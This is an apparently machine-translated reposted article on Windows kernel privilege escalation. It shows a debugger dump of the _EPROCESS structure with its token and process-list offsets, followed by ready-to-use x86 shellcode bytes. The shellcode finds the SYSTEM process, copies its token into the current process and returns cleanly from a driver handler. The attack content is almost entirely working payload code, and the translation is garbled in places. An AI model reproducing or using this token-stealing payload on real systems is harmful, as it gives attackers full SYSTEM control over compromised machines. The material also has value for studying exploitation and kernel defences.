Home > Developer > Windows

Windows Lift Right

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

1. Use token

Token offset in the PROCESS structure, offset in the x86 system 0xf8
The process consists of a doubly linked list, which is linked by _list_entry and 0xb8 to get all the address of the process offset 0xb8 through the loop process offset.

Kd>!process 0 0 systemprocess 860dac78 sessionid:none cid:0004 peb:00000000 parentcid:0000 dirbase:00185    Objecttable:8c001bb8 handlecount:518.      image:systemkd> DT _eprocess 860dac78 ntdll!_eprocess +0x000 PCB: _kprocess +0x098 Processlock : _ex_push_lock +0x0a0 createtime: _large_integer 0x1d3f694 ' 30d11160 +0x0a8 exittime: _large_integer 0x0 +0x0b0 rundownprotect: _ex_rundown_ref +0x0b4 uniqueprocessid:0x00000004 Void +0x0b8 activeprocesslinks: _list_entry [0x870676d8-0x8416f368] +0x0c0 processquotausage: [2] 0 +0x0c8 processquotapeak: [2] 0 +0x0d0 Comm ITCHARGE:0XB +0x0d4 quotablock:0x841631c0 _eprocess_quota_block +0x0d8 cpuquotablock: (null) +0x0  DC peakvirtualsize:0x770000 +0x0e0 virtualsize:0x1f0000 +0x0e4 sessionprocesslinks: _LIST_ENTRY [0x0-0x0 ] +0X0EC DebugPort: (null) +0x0f0 Exceptionportdata: (null) +0x0f0 Exceptionportvalue:0 +0x0f0 exceptionportstate:0y000 +0x0f4 objecttable:0x8c001bb8 _handle_table +0x0f8 Token : _ex_fast_ref +0x0fc workingsetpage:0 +0x100 addresscreationlock: _ex_push_lock +0x104 RotateInProgress:  (null) +0x108 forkinprogress: (NULL)

SHELLCODE

        "\x60"//Pushad                                       ; Save register State on the Stack        "\x64\xa1\x24\x01\x00\x00"//mov eax,FS: [Kthread_offset]; Nt!_kpcr. Pcrbdata.currentthread        "\x8b\x40\x50"//mov eax, [eax+ Eprocess_offset]; Nt!_kthread. Apcstate.process        "\x89\xc1"//mov ecx,eax(current _eprocess structure)"\x8b\x98\xf8\x00\x00\x00"//mov ebx, [eax+ Token_offset]; nt!_eprocess. Token---[Copy System PID Token]"\xba\x04\x00\x00\x00"//mov edx,4(SYSTEM PID); PID 4-System        "\x8b\x80\xb8\x00\x00\x00"//mov eax, [eax+ Flink_offset] <-|; nt!_eprocess. Activeprocesslinks.flink        "\x2d\xb8\x00\x00\x00"//Sub eax, Flink_offset |"\x39\x90\xb4\x00\x00\x00"//CMP[eax+ Pid_offset],edx|; nt!_eprocess. Uniqueprocessid        "\x75\xed"//jnz->|; Loop! (pid=4)        "\x8b\x90\xf8\x00\x00\x00"//mov edx, [eax+ Token_offset]; System nt!_eprocess. Token        "\x89\x91\xf8\x00\x00\x00"//mov[ecx+ Token_offset],edx        ; Replace Current Process token---[Recover]"\x61"//Popad                                        ; Restore register State from the Stack        "\x81\xc4\x8c\x07\x00\x00"//Add ESP, 0x78c; Offset of IRP on stack        "\x8b\x3c\x24"//mov EDI,DWORD PTR[ESP]; Restore the pointer to IRP        "\x83\xc4\x08"//Add ESP, 0x8; Offset of Dbgprint string        "\x8b\x1c\x24"//mov ebx,DWORD PTR[ESP]; Restore the Dbgprint string        "\x81\xc4\x34\x02\x00\x00"//Add ESP, 0x234; Target Frame to return        "\x31\xc0"NTSTATUS, Status_success:p"\x5d"//Pop EBP                                      ; Restore saved EBP        "\xc2\x08\x00"//ret 8                                        ; Return cleanly

Windows Lift Right

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
repo lift rough country lift spindles incremental lift calculation 6 rcx lift string right format right php right
Related Article
How to remove bootcamp Windows partition in Mac dual system
Windows Server 2016-active Directory Domain Services Port rollup
Windows Server 2003 key
Using word to convert a PDF file to a DOC file

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More